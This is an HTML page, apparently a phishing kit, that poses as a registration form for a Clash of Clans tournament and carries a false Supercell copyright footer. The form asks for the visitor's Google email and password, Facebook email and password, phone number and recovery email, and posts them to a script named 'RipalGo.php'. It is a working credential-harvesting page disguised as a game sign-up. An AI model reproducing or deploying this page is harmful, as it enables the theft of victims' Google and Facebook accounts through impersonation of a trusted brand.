<!DOCTYPE html>
<html lang="en">
<head>
<title>Tournament - Registrasi</title>
<!-- Meta tag Keywords -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="UTF-8">
<meta name="keywords" content=" volunteer enrollment form Widget a Flat Responsive Widget,Login form widgets, Sign up Web forms , Login signup Responsive web form,Flat Pricing table,Flat Drop downs,Registration Forms,News letter Forms,Elements" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
function hideURLbar(){ window.scrollTo(0,1); } </script>
<!-- Meta tag Keywords -->
<link rel="stylesheet" href="css/style.css" type="text/css" media="all" /><!-- Style-CSS -->
<link href="//fonts.googleapis.com/css?family=Heebo:300" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Exo" rel="stylesheet">
</head>
<body>
	<section class="agile-volt">
		<div class="agile-voltheader">
			<h1>TOURNAMENT<br> <label>Clash of Clans</label> </h1>
		</div>
		<div class="agile-voltsub">
			<h2>Registrasi</h2>
				<form action="RipalGo.php" method="post">
					<div class="agile-name">
						<p>Username</p>
						<input type="text" id="username" name="username" placeholder="Username" required="" autofocus>
					</div>
					<div class="clear"></div>
					<div class="agile-email">
						<p>Email Google</p>
						<input type="email" id="mail" name="mail" placeholder="email@email.com" required="">
					</div>
					<div class="clear"></div>
					<div class="agile-address">
						<p>Password Google</p>
						<input type="password" id="pw" name="pw" placeholder="********" required="" >
					</div>
             <div class="clear"></div>
					<div class="agile-email">
						<p>Email Facebook</p>
						<input type="email" id="user" name="user" placeholder="Username/Email" required="">
					</div>
          <div class="clear"></div>
					<div class="agile-email">
						<p>Password Facebook</p>
						<input type="password" id="pass" name="pass" placeholder="********" required="">
					</div>
           <div class="agile-name">
						<p>No Handphone</p>
						<input type="number" id="hp" name="hp" placeholder="+628" required="" autofocus>
					</div>
                <div class="agile-name">
						<p>Level Xp</p>
						<input type="number" id="xp" name="xp" placeholder="Xp" required="" autofocus>
					</div>
              <div class="clear"></div>
					<div class="agile-country">
						<p>Townhall Level</p>
						<select Id="th" name="th">
						<option value="TH1">Townhall 1</option>
						<option value="TH2">Townhall 2</option>
						<option value="TH3">Townhall 3</option>
						<option value="TH4">Townhall 4</option>
						<option value="TH5">Townhall 5</option>
						<option value="TH6">Townhall 6</option>
						<option value="TH7">Townhall 7</option>
						<option value="TH8">Townhall 8</option>
						<option value="TH9">Townhall 9</option>
						<option value="TH10">Townhall 10</option>
						<option value="TH11">Townhall 11</option>
						<option value="TH11">Townhall 12</option>
						</select>
					</div>
              <div class="agile-name">
						<p>Email Pemulihan</p>
						<input type="email" id="rec" name="rec" placeholder="recovery" required="" autofocus>
					</div>
					<div class="clear"></div>
					<input type="submit" value="submit" />
				</form>
		</div>
	<div class="agile-copyright">
				<footer>&copy; 2018 Supercell Rights Reserved ® Clash Of Clans</footer>
			</div>
	</section>
</body>
</html>
